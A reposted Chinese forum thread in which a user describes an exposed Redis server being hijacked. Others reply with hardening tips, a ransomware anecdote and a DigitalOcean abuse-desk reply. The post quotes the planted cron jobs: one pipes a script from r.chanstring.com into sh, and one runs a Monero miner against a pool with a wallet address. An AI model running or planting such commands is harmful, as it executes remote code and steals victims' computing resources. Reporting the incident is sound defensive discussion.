本文由 vps网友提供,转载请注明出处
本文链接: https://www.vpsvsvps.com/discuss/a/1676471763577344000.html
redis 居然可以公网访问....
这个国人干的事
登录 IP 是阿里云的
2 天前中招, r.chanstring.com 解析在 DO 的 IP
在 digitalocean 投诉过 说处理 都 2 天了 这机器竟然还他妈在线
https://i.niupic.com/images/2016/06/20/OBjiiQ.jpg
会加 2 条定时任务
*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh
*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
官方回
Hey there,
Thank you for your response.
Thank you for submitting your abuse complaint. One of our support engineers has picked it up and assigned it to the customer in question and it will be resolved as soon as possible.
Looking forward to hearing from you if you have any other questions or require any further assistance.
Thank you!
Jeff Elliott
Trust & Safety Specialist
DigitalOcean Support
然后就没下文了
1, 到手注入公钥后立马关掉密码登录
2, 除了 http 外的所有服务都不要开公网访问
能做到着两点的话, 基本安全无虞
公司内网的测试机也这样被爆过,重要文件被打包加密然后删除了目录。
要勒索 N 个比特币,我 TM 有这么多比特币还在这陪你玩?最后重装服务器搞定 。
没有觉得写的多好啊、、、
我只是想偷偷挖个矿。。。
没勒索数据的就是良心黑客了, 赶紧偷笑去吧.
redis 未授权访问的漏洞都这么长时间了还不修复。。。活该被黑啊
shell
放出来参考下吧
redis 一般是放在内网的
所以脚本是怎么写的。。
这个服务器是不是跑 jboss 的……笑……
所以说你们公司的 redis 可以公网访问?
502 Bad Gateway
脚本写的不错! 发来看看 怎么写的